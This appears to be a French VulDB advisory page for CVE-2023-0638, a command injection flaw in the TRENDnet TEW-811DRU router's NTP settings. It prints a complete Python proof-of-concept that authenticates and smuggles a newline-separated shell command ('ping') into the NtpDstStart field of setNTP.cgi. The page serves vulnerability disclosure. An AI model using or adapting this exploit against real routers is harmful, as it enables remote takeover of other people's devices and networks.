TRENDnet TEW-811DRU 1.0.10.0 Web Interface elévation de privilèges

CVSS Score de méta-températureExploit Prix Actuel (≈)Score d'intérêt CTI
6.5$0-$5k0.09

Une vulnérabilité qui a été classée critique a été trouvée dans TRENDnet TEW-811DRU 1.0.10.0. Affecté par ce problème est une fonction inconnue du composant Web Interface. La manipulation avec une valeur d'entrée inconnue mène à une vulnérabilité de classe elévation de privilèges.

La vulnerabilité a été publié en 02/02/2023 (non défini). Cette vulnérabilité est connue comme CVE-2023-0638. Les details techniques sont inconnus mais une méthode d'exploitation publique est connue.

Un exploit a été developpé en Python. L'exploit est disponible au téléchargment sur vuldb.com. Il est déclaré comme proof-of-concept. Le code utilisé par l'exploit est:

import requests,socket
import re
import time
from urllib.parse import urlencode

username = 'admin'
password = 'ZYWN7T47'
device_web_ip = '192.168.10.1'
ping_target_ip = '192.168.10.102'

request = {'HEAD': 
{'Host': '{}'.format(device_web_ip), 
'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0', 
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8', 
'Accept-Language': 'en-US,en;q=0.5', 
'Accept-Encoding': 'gzip, deflate', 
'Content-Type': 'application/x-www-form-urlencoded', 
'Content-Length': '555', 
'Origin': 'http://0.0.0.0:8081', 
#'Authorization': 'Basic YWRtaW46WllXTjdUNDc=', 
'Connection': 'keep-alive', 
'Referer': 'http://0.0.0.0:8081/adm/time.asp', 
'Cookie': 'expandable=5c', 
'Upgrade-Insecure-Requests': '1'}, 
'PARAM': {'token': 'fW092VEZZPulJJfC1WkY', 
'DSTenable': 'on',
'NtpDstEnable': 1, 
'NtpDstOffset': -7200, 
'NtpDstStart': 'abcd\nping -c 1 {}\n'.format(ping_target_ip), 
'tz_daylight_start_day_select': 1, 
'tz_daylight_start_time_select': 2, 
'NtpDstEnd': 100102, 
'tz_daylight_end_month_select': 384968387, 
'tz_daylight_end_day_select': 1, 
'tz_daylight_end_time_select': 2, 
'enableNTP': 1, 
'ntp_server': 1, 
'NTPServerIP': 'pool.ntp.org',
'time_zone': 'UCT_-11', 
'timer_interval': 16776915, 
'manual_year_select': 2012, 
'manual_month_select': 'abcd', 
'manual_day_select': 'abcd', 
'manual_min_select': -38, 
'manual_sec_select': "abcd", 
'timeTag': 'dummy',
'range.func': '/.../.../.../.../.../.../.../.../.../.../', 
'DNSServerGuest': ''}, 
'ATTR': 
{'URL': 'http://{}/setNTP.cgi'.format(device_web_ip), 
'METHOD': 'POST', 
'VERSION': 'HTTP/1.1'}
}

headers = request['HEAD']
params = request['PARAM']
method = request['ATTR']['METHOD']
url = request['ATTR']['URL']

login_header = {'Host': '0.0.0.0:8081', 
'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0', 
'Accept': '*/*', 
'Accept-Language': 'en-US,en;q=0.5', 
'Accept-Encoding': 'gzip, deflate', 
'Connection': 'keep-alive', 
'Referer': 'http://0.0.0.0:8081/login.asp', 
'Cookie': 'expandable=4c'}
login = 'http://{}/login.cgi?langSelection=EN'.format(device_web_ip)
probe = 'http://{}/wizard/wizard.asp'.format(device_web_ip)
loop = 3
r = None
while loop>0:
  try:
    loop -= 1
    r = requests.get(url=login,headers=login_header,auth=(username,password),timeout=5)
    if r.status_code != 200:
      continue
    r = requests.get(url=probe,headers=headers,auth=(username,password),timeout=5)
    pat = r'name="token" value="(.*?)"'
    token_value = re.findall(pat,r.text)
    if len(token_value)>0:
      params['token'] = token_value[0]
      print('new_token:{}'.format(token_value[0]))
      break
  except Exception as e:
    time.sleep((3-loop)*3)
    print('error:{}'.format(e))


try:
  r = requests.request(method=method,url=url,headers=headers,auth=(username,password),data=urlencode(params),verify=False,timeout=5)
except:
  pass

Il n'y a aucune information à propos de possibles contremesures connues. Il est suggéré de remplacer l'object infecté par un produit alternatif.

Produitinfo

Fournisseur

Nom

Version

Licence

CPE 2.3info

CPE 2.2info

CVSSv4info

VulDB CVSS-B Score: 🔍
VulDB CVSS-BT Score: 🔍
VulDB Vecteur: 🔍
VulDB Fiabilité: 🔍

CVSSv3info

VulDB Score méta-base: 7.2
VulDB Score de méta-température: 6.5

VulDB Note de base: 7.2
VulDB Note temporaire: 6.5
VulDB Vecteur: 🔍
VulDB Fiabilité: 🔍

CVSSv2info

AVACAuCIA
💳💳💳💳💳💳
💳💳💳💳💳💳
💳💳💳💳💳💳
VecteurComplexitéAuthentificationConfidentialitéIntégritéDisponibilité
ouvrirouvrirouvrirouvrirouvrirouvrir
ouvrirouvrirouvrirouvrirouvrirouvrir
ouvrirouvrirouvrirouvrirouvrirouvrir

VulDB Note de base: 🔍
VulDB Note temporaire: 🔍
VulDB Fiabilité: 🔍

Exploitinginfo

Classe: Elévation de privilèges
CWE: CWE-77 / CWE-74 / CWE-707
ATT&CK: T1202

Localement: Non
Remote: Oui

Disponibilité: 🔍
Accéder: Publique
Statut: Proof-of-Concept
Langage de programmation: 🔍
Télécharger: 🔍

EPSS Score: 🔍
EPSS Percentile: 🔍

Prédiction de prix: 🔍
Estimation actuelle des prix: 🔍

0-Dayouvrirouvrirouvrirouvrir
Aujourd'huiouvrirouvrirouvrirouvrir

Renseignements sur les menacesinfo

Intérêt: 🔍
Acteurs actifs: 🔍
Groupes APT actifs: 🔍

Contre-mesuresinfo

Recommandé: aucune mesure d'atténuation connue
Statut: 🔍

Heure 0 jour: 🔍

Chronologieinfo

02/02/2023 🔍
02/02/2023 +0 jours 🔍
02/02/2023 +0 jours 🔍
01/03/2023 +27 jours 🔍

Sourcesinfo

Statut: Non défini

CVE: CVE-2023-0638 (🔍)
scip Labs: https://www.scip.ch/en/?labs.20161013

Entréeinfo

Établi: 02/02/2023 09:09
Mise à jour: 01/03/2023 16:39
Changements: 02/02/2023 09:09 (38), 02/02/2023 09:10 (2), 01/03/2023 16:39 (2)
Compléter: 🔍
Auteur: leetsun

Submitinfo

Accepté

  • Submit #76135: Command injection vulnerability in TRENDnet router TEW-811DRU (par leetsun)

Discussion

Aucun commentaire pour l'instant. Langues: fr + en.

Veuillez vous connecter pour commenter.

Interested in the pricing of exploits?

See the underground prices here!